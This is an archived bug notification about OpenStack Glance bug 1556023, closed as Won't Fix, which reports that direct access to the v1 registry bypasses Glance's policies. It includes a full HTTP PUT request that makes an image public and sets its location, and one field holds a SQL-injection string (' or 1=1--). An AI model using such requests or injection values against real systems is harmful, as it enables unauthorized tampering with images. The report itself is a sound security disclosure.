yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #85646
[Bug 1556023] Re: Direct v1 registry access can bypass Glance's policies
Glance does not support V1 and its has been removed since Ussuri.
** Changed in: glance
Status: New => Won't Fix
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1556023
Title:
Direct v1 registry access can bypass Glance's policies
Status in Glance:
Won't Fix
Status in OpenStack Security Advisory:
Won't Fix
Bug description:
If a non-admin user can access the registry directly, then they can
bypass Glance's policies.
Here, for example, is a registry request which bypasses both the
policy to mark an image as public, and to set the image location
directly:
PUT /images/37d89430-8bf2-433a-843e-909c752866df HTTP/1.1.
Host: 127.0.0.1:9191.
Content-Length: 606.
Accept-Encoding: gzip, deflate.
Accept: application/json.
x-auth-token: dc9e09e4954d4b42983784b3c4642bd9.
Connection: keep-alive.
User-Agent: restfuzz-0.1.0.
Content-Type: application/json.
.
{"image": {"status": "active", "deleted": false, "name":
"testpublic", "container_format": "bare", "min_ram": 2147483647,
"disk_format": "qcow2", "id": "37d89430-8bf2-433a-843e-909c752866df",
"owner": "48c21395db63405d94aee1f965615d1c", "min_disk": 2147483647,
"is_public": true, "properties": {"image_type": "snapshot",
"instance_uuid": "7df74ad1-1caf-44ac-8f4b-4313f5fda5ed", "user_id":
"76b4ded518594216832e06c261523074' or 1=1--", "base_image_ref":
"1c8c3ba8-3a2f-4d06-b1ba-ac1791b599d8"}, "size": 6599958588555,
"virtual_size": 6599958588551, "min_disk": 2147483647,
"location":"http://google.com"}}
Note that deployments should firewall the registry off; typical users should only have access to the Glance API endpoint.
However, users such as a Swift administrator who does not have Glance admin powers but is able to access the 'private' network can bypass Glance's policies.
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1556023/+subscriptions